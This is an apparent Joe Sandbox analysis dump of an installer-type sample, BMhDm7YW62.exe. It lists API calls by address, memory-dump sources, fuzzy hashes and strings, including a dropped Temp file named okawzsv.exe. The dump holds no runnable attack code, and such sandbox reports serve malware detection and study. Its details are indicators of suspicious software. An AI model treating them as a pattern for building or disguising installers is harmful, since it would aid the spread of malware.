                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B91
                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA6
                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCA
                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BF0
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404C15
                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C85
                                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D2E
                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D3D
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404DB6
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404DBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 1638840714-813528018
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                                                                                        • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                                                                                        • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00420538), ref: 004043F9
                                                                                                                        • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ), ref: 00404405
                                                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                                                                                                          • Part of subcall function 0040543D: GetDlgItemTextA.USER32(?,?,00000400,0040444E), ref: 00405450
                                                                                                                          • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                          • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                          • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                          • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                                                                                                          • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                          • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                                                                                          • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $A$C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 2624150263-428732121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 123533781-1116454783
                                                                                                                        • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                                                                                        • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                                                                                        • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                                                                                        • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                                                                                        • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                                                                                        • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                                                                                        • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404027
                                                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040403B
                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404059
                                                                                                                        • GetSysColor.USER32(?), ref: 0040406A
                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404079
                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404088
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00404092
                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040A0
                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040AF
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404112
                                                                                                                        • SendMessageA.USER32(00000000), ref: 00404115
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404140
                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404180
                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040418F
                                                                                                                        • SetCursor.USER32(00000000), ref: 00404198
                                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,.B,00000000,00000000,00000001), ref: 004041AB
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004041B8
                                                                                                                        • SetCursor.USER32(00000000), ref: 004041BB
                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041E7
                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                        • String ID: N$open$.B
                                                                                                                        • API String ID: 3615053054-720656042
                                                                                                                        • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                        • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                                                                                        • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                        • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextA.USER32(00000000,jtlkrtaftpgmppuxhth Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: F$jtlkrtaftpgmppuxhth Setup
                                                                                                                        • API String ID: 941294808-2301260693
                                                                                                                        • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                        • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                                                                                        • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                        • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                                                                                                        • GetShortPathNameA.KERNEL32(?,004226C8,00000400), ref: 0040593C
                                                                                                                        • GetShortPathNameA.KERNEL32(00000000,00422140,00000400), ref: 00405959
                                                                                                                        • wsprintfA.USER32 ref: 00405977
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                                                                                                          • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                          • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                        • String ID: %s=%s$@!B$[Rename]
                                                                                                                        • API String ID: 3445103937-2946522640
                                                                                                                        • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                        • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                                                                                        • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                        • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                                                                                        • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000400), ref: 00405CDD
                                                                                                                        • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000400), ref: 00405CF0
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                                                                                        • SHGetPathFromIDListA.SHELL32(0040F0E0,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ), ref: 00405D3A
                                                                                                                        • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                                                                                        • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 900638850-908753399
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-836901544
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00403ED8
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403EF4
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403F00
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403F0C
                                                                                                                        • GetSysColor.USER32(?), ref: 00403F1F
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403F2F
                                                                                                                        • DeleteObject.GDI32(?), ref: 00403F49
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403F53
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000C000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402758
                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294113728-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                        • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                        • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                        • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531174081-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476E
                                                                                                                        • GetMessagePos.USER32 ref: 00404776
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404790
                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A2
                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C8
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                        • MulDiv.KERNEL32(0006365D,00000064,00063661), ref: 00402BB4
                                                                                                                        • wsprintfA.USER32 ref: 00402BC4
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
